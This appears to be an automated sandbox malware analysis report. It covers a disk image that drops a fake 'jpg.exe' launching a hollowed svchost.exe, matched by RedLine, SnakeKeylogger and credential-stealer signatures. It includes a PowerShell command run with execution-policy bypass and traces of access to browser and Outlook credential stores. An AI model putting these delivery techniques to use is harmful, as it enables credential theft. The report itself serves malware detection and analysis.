        Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.troj.spyw.evad.winIMG@7/8@3/3
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\tmp.logJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:304:WilStaging_02
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3sb3z55.j0i.ps1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005965000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005971000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006957000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A3E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
        Source: g1TLK7mbZD.imgReversingLabs: Detection: 31%
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt) > tmp.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)
        Source: unknownProcess created: \Device\CdRom0\9236-pagaconferma-jpg.exe "D:\9236-pagaconferma-jpg.exe"
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "D:\9236-pagaconferma-jpg.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ex bypass -command Mount-DiskImage -ImagePath (gc C:\Windows\path.txt)Jump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeProcess created: C:\Windows\SysWOW64\svchost.exe "D:\9236-pagaconferma-jpg.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: apphelp.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: wsock32.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: version.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: winmm.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: mpr.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: wininet.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: userenv.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: edgegdi.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: uxtheme.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: windows.storage.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: wldp.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: \Device\CdRom0\9236-pagaconferma-jpg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: g1TLK7mbZD.imgStatic file information: File size 1703936 > 1048576
        Source: Binary string: _.pdb source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: 9236-pagaconferma-jpg.exe, 00000007.00000003.31555020352.0000000004900000.00000004.00001000.00020000.00000000.sdmp, 9236-pagaconferma-jpg.exe, 00000007.00000003.31558367702.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp
        Source: 9236-pagaconferma-jpg.exe.2.drStatic PE information: real checksum: 0xa2135 should be: 0x125435
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: \Device\CdRom0\9236-pagaconferma-jpg.exeJump to dropped file

        Hooking and other Techniques for Hiding and Protection

        barindex
        Loading BitLocker PowerShell Module
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
